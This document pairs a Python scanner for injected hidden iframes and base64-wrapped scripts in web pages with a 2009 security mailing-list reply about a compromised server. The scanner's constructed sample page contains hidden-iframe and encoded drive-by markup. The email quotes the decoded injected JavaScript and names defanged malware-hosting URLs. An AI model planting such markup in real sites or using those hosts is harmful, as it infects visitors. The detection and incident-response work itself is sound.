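A detection pass for the injected markup described across the thread (the hidden iframes in Russell's index.html files, the base64-wrapped script Jake decoded), added here as an example and not code from any poster: it reports hidden or off-site iframes, off-site script sources, and base64 blobs passed to atob() or base64_decode(), decodes those and pulls URLs out of them as indicators. It goes beyond Jake's case in also handling the PHP base64_decode() form. The sample page is constructed with a documentation-range address; the regexes and the "hidden" heuristic are this example's assumptions.

```python
"""Scan a page for the injected markup described on this thread.

Added example (not code from any poster). It reports hidden or off-site
iframes, off-site script sources, and base64 blobs handed to atob() or
base64_decode(); the blobs are decoded and any URLs inside them are
collected as indicators. Sample page and addresses are constructed.
"""
import base64
import re

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|\b(?:width|height)\s*=\s*['\"]?0\b", re.I)
DECODER_RE = re.compile(r"(?:atob|base64_decode)\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
HOST_RE = re.compile(r"https?://([^/:?#]+)", re.I)

# Constructed sample: a hidden iframe plus a base64-wrapped document.write(),
# the two shapes seen in the thread. The blob is built here so it is valid base64.
_PAYLOAD = ("document.write('<embed src=\"http://203.0.113.9/inc/web/include/spl.php\" "
            "width=\"0\" height=\"0\"></embed>');")
SAMPLE_PAGE = (
    "<html><body><p>Welcome to our site</p>\n"
    '<script src="/js/site.js"></script>\n'
    '<iframe src="http://203.0.113.9/inc/web/index.php" style="display: none;" height=0 width=0></iframe>\n'
    "<script>eval(atob('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));</script>\n"
    "</body></html>\n"
)


def _is_external(src, site_hosts):
    """True for an absolute http(s) URL whose host is not one of ours."""
    m = HOST_RE.match(src)
    return bool(m) and m.group(1).lower() not in {h.lower() for h in site_hosts}


def _decode_b64(blob):
    """Decode a base64 blob to text, or None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(re.sub(r"\s+", "", blob), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def scan_page(html, site_hosts=()):
    """Return a list of findings, each {kind, url, evidence}."""
    findings = []
    for attrs in IFRAME_RE.findall(html):
        m = SRC_RE.search(attrs)
        src = m.group(1) if m else ""
        if HIDDEN_RE.search(attrs) or _is_external(src, site_hosts):
            findings.append({"kind": "hidden-iframe", "url": src, "evidence": attrs.strip()})
    for src in SCRIPT_SRC_RE.findall(html):
        if _is_external(src, site_hosts):
            findings.append({"kind": "external-script", "url": src, "evidence": src})
    for blob in DECODER_RE.findall(html):
        decoded = _decode_b64(blob)
        if decoded is None:
            continue
        for url in URL_RE.findall(decoded) or [""]:
            findings.append({"kind": "base64-payload", "url": url, "evidence": decoded[:80]})
    return findings


def iocs(findings):
    """Sorted list of hosts referenced by the findings, for blocklists and log searches."""
    hosts = set()
    for f in findings:
        m = HOST_RE.match(f["url"])
        if m:
            hosts.add(m.group(1).lower())
    return sorted(hosts)


if __name__ == "__main__":
    found = scan_page(SAMPLE_PAGE, site_hosts=("www.example.org",))
    for f in found:
        print(f"{f['kind']:16} {f['url'] or '-':50} {f['evidence'][:60]}")
    print("hosts to block / search for:", ", ".join(iocs(found)))
```

Run it over every index.*, error page and PHP file in a web root (Jake found the code on the 404 pages as well as index files), and feed the host list into proxy and DNS log searches to find which clients already loaded the payload. A one-line base64 blob that decodes to readable JavaScript or PHP is itself a strong signal even when no URL is found in it.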
Re: Malicious code just found on web server
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:

> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
>
> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>
> The 1.2.3.4 in the URL is my public IP address (I changed that).
>
> Below the javascript, it grabs a PDF:
>
> <embed src=include/two.pdf width=1 height=0 style=border:none></embed>
>
> That PDF is on the site, I haven't looked at it yet though.

Not only is that .pdf malicious, when executed it also fetches additional malware from:

hxxp:// test1.ru /1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of crimeware.

This is in addition to the other malicious URLs mentioned in this thread.

- ferg

--
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/